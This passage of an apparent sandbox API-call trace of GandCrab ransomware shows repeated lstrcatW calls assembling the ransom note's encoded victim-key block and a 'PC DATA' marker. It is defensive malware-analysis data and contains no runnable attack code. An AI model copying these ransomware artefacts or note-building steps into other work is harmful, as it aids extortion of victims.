DHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n" [0040.774] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n") returned="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n" [0040.775] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n", lpString2="---BEGIN PC DATA---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---") returned="---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/We